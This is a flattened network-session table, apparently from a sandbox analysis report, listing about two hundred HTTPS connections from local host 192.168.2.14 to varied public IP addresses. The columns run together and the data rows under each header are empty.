                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18332192.168.2.143656653.218.151.120443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18333192.168.2.1457120105.143.192.236443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18334192.168.2.1445992123.163.45.137443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18335192.168.2.1432948192.65.127.162443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18336192.168.2.1437422120.111.157.163443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18337192.168.2.1454846112.75.57.113443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18338192.168.2.1445786212.45.164.104443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18339192.168.2.1439312175.214.108.207443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18340192.168.2.1452200210.51.197.225443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18341192.168.2.1449770148.80.83.102443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18342192.168.2.145194678.164.72.47443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18343192.168.2.1450262111.244.146.183443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18344192.168.2.1458528212.247.54.130443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18345192.168.2.1442930145.202.19.150443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18346192.168.2.143614213.88.171.180443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18347192.168.2.1437644145.61.204.219443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18348192.168.2.1438920171.144.21.112443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18349192.168.2.145570068.60.215.0443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18350192.168.2.1442134163.64.184.6443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18351192.168.2.1459120138.8.182.168443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18352192.168.2.1442234121.180.208.188443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18353192.168.2.14375861.26.12.152443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18354192.168.2.1442258100.24.212.153443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18355192.168.2.143877436.157.47.150443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18356192.168.2.143386624.254.227.183443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18357192.168.2.1459220223.176.144.173443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18358192.168.2.144853041.174.112.36443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18359192.168.2.1438974177.102.26.100443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18360192.168.2.144588080.236.30.168443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18361192.168.2.1454566211.86.190.63443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18362192.168.2.1432834133.49.66.220443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18363192.168.2.1441614143.29.99.168443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18364192.168.2.1432902209.200.98.11443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18365192.168.2.1459290137.255.254.126443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18366192.168.2.1434686130.46.75.154443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18367192.168.2.1451070132.114.247.173443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18368192.168.2.1441488171.149.148.1443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18369192.168.2.1455648206.80.100.75443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18370192.168.2.1439548137.33.113.213443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18371192.168.2.143425239.41.64.238443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18372192.168.2.146097852.105.159.56443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18373192.168.2.1440520108.206.38.10443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18374192.168.2.143397466.114.216.15443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18375192.168.2.1448988163.133.144.100443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18376192.168.2.14538589.63.132.18443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18377192.168.2.144903654.16.171.208443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18378192.168.2.144277436.22.241.190443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18379192.168.2.145890849.222.92.163443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18380192.168.2.145203867.91.91.173443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18381192.168.2.1450734105.206.221.161443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18382192.168.2.14563121.185.107.248443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18383192.168.2.1448532113.239.10.251443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18384192.168.2.145965646.22.101.245443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18385192.168.2.144372838.252.139.52443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18386192.168.2.143748090.221.213.158443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18387192.168.2.1438960136.222.41.126443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18388192.168.2.145686262.142.105.19443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18389192.168.2.1451980180.178.239.167443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18390192.168.2.14513569.65.200.0443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18391192.168.2.1454354119.154.227.22443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18392192.168.2.144486881.110.141.90443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18393192.168.2.1433974220.32.46.218443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18394192.168.2.1454980165.95.29.15443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18395192.168.2.1434502108.206.73.214443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18396192.168.2.1447210137.115.54.223443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18397192.168.2.1433798137.251.251.170443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18398192.168.2.1442482211.3.32.243443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18399192.168.2.145663036.70.10.63443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18400192.168.2.145711893.22.244.178443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18401192.168.2.143787869.145.122.38443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18402192.168.2.1437478108.206.110.62443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18403192.168.2.1434048221.44.45.54443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18404192.168.2.145120837.227.74.99443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18405192.168.2.1446752141.93.84.177443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18406192.168.2.1450736107.174.29.233443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18407192.168.2.1439458165.212.219.84443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18408192.168.2.1433746126.126.12.255443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18409192.168.2.143521265.72.57.176443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18410192.168.2.1433642116.81.162.175443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18411192.168.2.144642275.87.254.113443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18412192.168.2.145036864.113.132.158443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18413192.168.2.1438568222.51.63.161443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18414192.168.2.14485421.121.194.133443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18415192.168.2.1450926171.190.212.145443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18416192.168.2.1450306187.47.234.21443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18417192.168.2.1441544171.34.186.247443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18418192.168.2.1438522203.53.137.40443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18419192.168.2.143628277.184.198.246443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18420192.168.2.1443010181.247.250.176443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18421192.168.2.1449206186.183.28.122443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18422192.168.2.1453320101.171.141.41443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18423192.168.2.1440550115.142.170.212443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18424192.168.2.1450964206.202.100.179443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18425192.168.2.143576886.241.245.153443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18426192.168.2.144790086.93.158.233443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18427192.168.2.1460490156.45.77.149443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18428192.168.2.1452888211.157.147.230443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18429192.168.2.1451932144.111.90.63443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18430192.168.2.143492437.196.45.116443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18431192.168.2.1455676187.134.168.20443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18432192.168.2.1449588183.57.30.44443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18433192.168.2.143845453.245.69.142443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18434192.168.2.1450024149.121.25.93443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18435192.168.2.143826259.42.188.72443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18436192.168.2.1459506122.3.239.28443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18437192.168.2.145193090.188.192.27443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18438192.168.2.1455316132.60.12.208443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18439192.168.2.1450948109.71.70.146443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18440192.168.2.143640084.172.87.128443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18441192.168.2.145877270.81.96.101443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18442192.168.2.145633025.11.72.179443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18443192.168.2.145396438.71.38.73443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18444192.168.2.1438316158.183.176.11443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18445192.168.2.1436586177.183.27.58443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18446192.168.2.1454604110.23.102.166443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18447192.168.2.1445404111.247.89.254443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18448192.168.2.145053249.80.48.201443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18449192.168.2.143697638.245.148.194443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18450192.168.2.1439814183.96.204.120443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18451192.168.2.145240827.220.177.252443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18452192.168.2.1447512181.25.40.180443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18453192.168.2.1448782191.45.183.185443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18454192.168.2.1456962178.9.39.179443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18455192.168.2.146000448.198.10.237443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18456192.168.2.146073620.39.165.205443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18457192.168.2.145929076.245.116.149443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18458192.168.2.145385483.146.182.61443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18459192.168.2.14566469.196.44.185443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18460192.168.2.1457360120.69.106.255443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18461192.168.2.1433290190.68.232.140443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18462192.168.2.143633077.47.12.35443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18463192.168.2.1452040196.52.254.16443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18464192.168.2.1454962174.53.9.239443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18465192.168.2.1437280147.47.176.179443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18466192.168.2.1448396106.152.116.75443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18467192.168.2.144556857.61.125.251443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18468192.168.2.144581079.175.154.170443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18469192.168.2.1440514160.201.205.239443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18470192.168.2.1439462160.103.156.5443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18471192.168.2.1447180172.164.192.41443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18472192.168.2.143619859.22.225.175443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18473192.168.2.1451332106.52.136.36443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18474192.168.2.1456020207.175.205.157443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18475192.168.2.1439932183.48.14.144443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18476192.168.2.1455626170.122.237.156443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18477192.168.2.1433486216.209.240.85443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18478192.168.2.144882283.98.98.15443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18479192.168.2.1445788209.220.20.190443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18480192.168.2.145618652.188.227.181443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18481192.168.2.1434548197.161.255.128443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18482192.168.2.1433260181.250.207.8443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18483192.168.2.144456297.208.203.122443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18484192.168.2.1456604168.161.241.103443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18485192.168.2.1433476111.120.38.13443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18486192.168.2.143536884.138.15.167443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18487192.168.2.1458300104.207.30.136443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18488192.168.2.144445488.162.235.236443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18489192.168.2.144364670.189.121.5443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18490192.168.2.143885063.1.153.22443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18491192.168.2.144301679.59.103.240443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18492192.168.2.145915854.114.191.13443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18493192.168.2.144570212.15.210.5443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18494192.168.2.1450770184.71.59.34443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18495192.168.2.145820894.23.97.30443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18496192.168.2.1453790174.143.185.121443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18497192.168.2.1459788180.211.59.47443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18498192.168.2.144885085.43.179.73443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18499192.168.2.1453290206.41.117.31443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18500192.168.2.1442158101.65.208.92443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18501192.168.2.1459110194.252.139.54443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18502192.168.2.144098881.7.20.171443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18503192.168.2.1453720147.234.130.76443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18504192.168.2.1449786108.225.179.88443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18505192.168.2.1446328102.97.40.145443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18506192.168.2.145152413.251.98.183443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18507192.168.2.1451402164.11.186.137443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18508192.168.2.144859676.6.202.191443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18509192.168.2.146003843.228.144.151443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18510192.168.2.1457796121.51.90.56443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18511192.168.2.1450514128.180.168.230443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18512192.168.2.144227262.236.188.181443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18513192.168.2.1459978111.228.151.107443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18514192.168.2.1448864220.201.18.173443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18515192.168.2.143778845.199.26.5443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18516192.168.2.1456980152.206.108.252443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18517192.168.2.1437762216.116.194.85443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18518192.168.2.1452176117.214.79.252443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18519192.168.2.1453576168.117.163.171443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18520192.168.2.1438476172.244.79.223443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18521192.168.2.145090653.51.128.169443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18522192.168.2.146058088.12.204.232443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18523192.168.2.1454310216.80.210.184443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18524192.168.2.1450404163.155.210.75443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18525192.168.2.1445136133.208.205.8443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18526192.168.2.146056213.38.44.83443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18527192.168.2.143726276.190.66.111443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18528192.168.2.145190631.105.8.212443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18529192.168.2.144140696.160.222.187443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18530192.168.2.1435676156.144.81.97443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18531192.168.2.1434750180.50.185.122443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18532192.168.2.143407068.254.169.147443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18533192.168.2.145818097.101.228.165443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18534192.168.2.1457898178.87.129.221443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18535192.168.2.1458014194.57.6.22443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18536192.168.2.145659269.168.61.195443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18537192.168.2.1447508174.29.188.35443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18538192.168.2.144120631.172.16.171443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18539192.168.2.145102238.37.121.124443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18540192.168.2.1443768168.67.156.150443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18541192.168.2.144383475.18.171.27443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18542192.168.2.1434958178.46.72.242443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18543192.168.2.143879081.188.186.196443
                                                      TimestampBytes transferredDirectionData


